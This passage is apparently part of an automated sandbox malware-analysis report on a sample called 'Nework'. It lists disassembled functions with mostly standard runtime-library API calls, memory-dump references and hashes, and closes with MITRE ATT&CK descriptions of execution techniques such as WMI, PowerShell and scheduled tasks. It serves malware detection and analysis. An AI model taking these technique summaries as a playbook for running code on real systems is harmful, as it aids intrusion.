Instruction Fuzzy Hash: 0851993990824A9FDF10CF68C4A1BAEBBF4EF25314F14449EE891A7251D732ED44CB91

Function 001B2B5C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 001B2B6F

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 5d3f59949baf02e60cae195b96ffdcd3116755ae323aed687cec58a84e0be097
Instruction ID: b0cd583a9d193b00a6ee1d075461c26baa4ccf695f33df6e807aedd95ba40568
Opcode Fuzzy Hash: 5d3f59949baf02e60cae195b96ffdcd3116755ae323aed687cec58a84e0be097
Instruction Fuzzy Hash: 12314875A00309DFCF15EF94C9C0AEE7BB9BF54310F1404AAD905AB246DB70A949DBA1

Function 001CD73F Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 001C682C: _free.LIBCMT ref: 001C683A

Part of subcall function 001CE716: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,001D4BB0,?,00000000,00000000), ref: 001CE7B8

GetLastError.KERNEL32 ref: 001CD7A7
__dosmaperr.LIBCMT ref: 001CD7AE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 001CD7ED
__dosmaperr.LIBCMT ref: 001CD7F4

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: d03c225463a6e4ca94e823cfe0510f3f16b419a8385e62d2ef45cc0aa55f966d
Instruction ID: e64aee64109717c109e6bca79b1275a55f80b955cd1c05bf53934c4e170e7f8b
Opcode Fuzzy Hash: d03c225463a6e4ca94e823cfe0510f3f16b419a8385e62d2ef45cc0aa55f966d
Instruction Fuzzy Hash: E521B671604305AF9B20AFA5ACC1F6BB7ADEF34364710453DF92997550D771EC409B90

Function 001C08F8 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 001C0949
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001C0931

Part of subcall function 001B8D8F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B8DB0

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001C09AC
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,001EF4A8), ref: 001C09B1

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 142d610ff27f608dbf0a277e454fe34c253840fee8ebb27ca347cd75ce56ca18
Instruction ID: 6943aee6b4f8587be150114a60ccfde8a98889378a9913b44d2e82617a8f4a76
Opcode Fuzzy Hash: 142d610ff27f608dbf0a277e454fe34c253840fee8ebb27ca347cd75ce56ca18
Instruction Fuzzy Hash: 7F21F971600615AFD705E798CC85EAEB7BCEF98724B05411AFA19A32D1CB70ED41CAA1

Function 001CA461 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001C67AA,?,?,?,?,001C73DE,?), ref: 001CA466
_free.LIBCMT ref: 001CA4C3
_free.LIBCMT ref: 001CA4F9
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,001C67AA,?,?,?,?,001C73DE,?), ref: 001CA504

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: de8493fa4936a3adc8a4a88b02182a8731e5c435b6d794ae53890f07ae8759a3
Instruction ID: cb94c590ed87066bc6a437d60d66fdc4be323d2067fccecb11eed85ba88fe0b3
Opcode Fuzzy Hash: de8493fa4936a3adc8a4a88b02182a8731e5c435b6d794ae53890f07ae8759a3
Instruction Fuzzy Hash: CA1177322086086AD61766B46CCAF3F225D9FF1778BA9022DF714D61D1DF71DC468222

Function 001C118F Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001C1223
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 001C11D4

Part of subcall function 001B817B: SafeRWList.LIBCONCRT ref: 001B818C

SafeRWList.LIBCONCRT ref: 001C1219
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 001C1239

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: 8329089a705ecf16a2d62846700dd6e39550c5ed8cf823dbe4ea4e6a61de8a35
Instruction ID: 9b26a1e7f8ed7ae18c439074e1e3ff8cce19e36cded64979e671c065089f89d8
Opcode Fuzzy Hash: 8329089a705ecf16a2d62846700dd6e39550c5ed8cf823dbe4ea4e6a61de8a35
Instruction Fuzzy Hash: AA21077564020EEFC704DF24C881FA5FBE9BBA6714F24C2AAD4054B142DB35E986CB80

Function 001CA5B8 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001C7378,00192207), ref: 001CA5BD
_free.LIBCMT ref: 001CA61A
_free.LIBCMT ref: 001CA650
SetLastError.KERNEL32(00000000,00000006,000000FF,?,001C7378,00192207), ref: 001CA65B

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: cfd3697bc0c442df05f5b9829fa4d77eff98ab7c9b6095d44c274cd8fe9be00e
Instruction ID: 35fa3d4b337b6d6c521facdcec3454b53f603dde05d435cc4c58811f99526c96
Opcode Fuzzy Hash: cfd3697bc0c442df05f5b9829fa4d77eff98ab7c9b6095d44c274cd8fe9be00e
Instruction Fuzzy Hash: C811C2322086182AD61326B45CC6F3B265EAFF07B9BA9422CF314C61D1DB71DC418226

Function 001AF14D Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 001AF16F

Part of subcall function 001AF32B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 001B52E6

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 001AF190

Part of subcall function 001B0012: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 001B002E

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 001AF1AC
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 001AF1B3

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: d8ef9608b57dccfe544088c3166d0ddd05a0c940581e6dd0ec1fed340f68b8e7
Instruction ID: 5e77c9116fbb1b0aa72ef1bf08ac80fbdf31721a068f9b610f590823a1dbb31b
Opcode Fuzzy Hash: d8ef9608b57dccfe544088c3166d0ddd05a0c940581e6dd0ec1fed340f68b8e7
Instruction Fuzzy Hash: 6C01C479500309EADB207FA9CC8199BBBACEF22394B50493EF55592181D7B0D905C7A1

Function 001C321E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001C3238
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 001C324C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 001C3264
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C327C

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: d58fcf1ff8251d59980848287e0d230561238d1104a91768851902735b8cb7a3
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 7A01A236600514B7CF16AE54C851FEF77AAAF75350F004519FC22AB282DB21EE0196A0

Function 001CB53C Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,001CB6A1,00000000,?,001D1D9B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 001CB552
GetLastError.KERNEL32(?,001D1D9B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,001CB6A1,00000000,00000104,?), ref: 001CB55C
__dosmaperr.LIBCMT ref: 001CB563

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: bd6e7fc68ae0b55f3e741e49883af19ecd132177d20dab6750800cc9048beb15
Instruction ID: 8b04a615c2ed15ddf96f025a97cadd17d88dcd46011632d9dcce9f663c257aff
Opcode Fuzzy Hash: bd6e7fc68ae0b55f3e741e49883af19ecd132177d20dab6750800cc9048beb15
Instruction Fuzzy Hash: 7FF08631604155BB8B215FA2DC45E4EFF69FF693A0B004119F519CB420C771E891DBD0

Function 001CB5A5 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,001CB6A1,00000000,?,001D1D26,00000000,00000000,001CB6A1,?,?,00000000,00000000,00000001), ref: 001CB5BB
GetLastError.KERNEL32(?,001D1D26,00000000,00000000,001CB6A1,?,?,00000000,00000000,00000001,00000000,00000000,?,001CB6A1,00000000,00000104), ref: 001CB5C5
__dosmaperr.LIBCMT ref: 001CB5CC

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 859cb6f73f6ed66e8ea0a1ce96a6f4448d4f848ef0a6001da3a27f933b14a669
Instruction ID: 0ceefbf163e5fe19495ded809b365fc3060b5e709667f74d7424d66e1e922e1b
Opcode Fuzzy Hash: 859cb6f73f6ed66e8ea0a1ce96a6f4448d4f848ef0a6001da3a27f933b14a669
Instruction Fuzzy Hash: EAF0A931608155BBCB215FE2DC45E5AFF6AFF643A0B014519F419CB520CB71E891DBD0

Function 001D68BF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00198610,0000000F,001EFB08,00000000,00198610,?,001D4FAA,00198610,00000001,00198610,00198610,?,001CFE84,00000000,?,00198610), ref: 001D68D6
GetLastError.KERNEL32(?,001D4FAA,00198610,00000001,00198610,00198610,?,001CFE84,00000000,?,00198610,00000000,00198610,?,001D03D8,00198610), ref: 001D68E2

Part of subcall function 001D68A8: CloseHandle.KERNEL32(FFFFFFFE,001D68F2,?,001D4FAA,00198610,00000001,00198610,00198610,?,001CFE84,00000000,?,00198610,00000000,00198610), ref: 001D68B8

___initconout.LIBCMT ref: 001D68F2

Part of subcall function 001D686A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001D6899,001D4F97,00198610,?,001CFE84,00000000,?,00198610,00000000), ref: 001D687D

WriteConsoleW.KERNEL32(00198610,0000000F,001EFB08,00000000,?,001D4FAA,00198610,00000001,00198610,00198610,?,001CFE84,00000000,?,00198610,00000000), ref: 001D6907

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0bd227eb6738c6abda44ea23dec0f7c61ef8da1bd724fd47dda61cc8389820aa
Instruction ID: 5c690f6529ef24fba2dcbe71fe7fda8185030324906bfa1272fb2e07d3bbad58
Opcode Fuzzy Hash: 0bd227eb6738c6abda44ea23dec0f7c61ef8da1bd724fd47dda61cc8389820aa
Instruction Fuzzy Hash: 1AF03736001169BBCF521FD5DC08A9D3F65FB087A5F154012FE1885630C77189A0DB90

Function 001C1561 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 001C15C1
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C160C

Strings

pContext, xrefs: 001C1604

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: e7183b687887025fc305298ae44b85ad6ff5fae898c1df71e951771f88926ec3
Instruction ID: 4e97308017152df16547b576f38ee2c1251e48bff5a11cabaa77552601c11979
Opcode Fuzzy Hash: e7183b687887025fc305298ae44b85ad6ff5fae898c1df71e951771f88926ec3
Instruction Fuzzy Hash: E0112936B80210ABCF1AEF68C485E6D7375AFA63A0B15806DE9029B343DB74DD01CBC0

Function 001BB78C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 001BB7AE
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001BB7C1

Strings

pContext, xrefs: 001BB7B9

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 52a98401b090401bc9cc1740e8bce7fe414ffa88a6bbf2ecdaac0c4033b299d9
Instruction ID: e116a24f08630d1b84e03a6cf4fab39f309a698397d298e1445766f5b7f24535
Opcode Fuzzy Hash: 52a98401b090401bc9cc1740e8bce7fe414ffa88a6bbf2ecdaac0c4033b299d9
Instruction Fuzzy Hash: 16E0D83DB002086BCB04B7A9E899D9EB7BD9FE47147148019E511E3392DFB4EA44CED0

Function 001B332C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B335C

Strings

pScheduler, xrefs: 001B3354
version, xrefs: 001B3341

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 8f68aa20e33c9dab4c2dad5cfa2a7dd46cceb776ee8316d2d8d593ad915b4bfa
Instruction ID: f3d9415cf3438d3c99adb6ab4e4ef39f165b2f204086d13818f27d1bfc7a2b22
Opcode Fuzzy Hash: 8f68aa20e33c9dab4c2dad5cfa2a7dd46cceb776ee8316d2d8d593ad915b4bfa
Instruction Fuzzy Hash: A0E08C38584748BACB15EA69D80AFCE77A8AB20708F14C025F420650E19BF4D7ACCE81

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

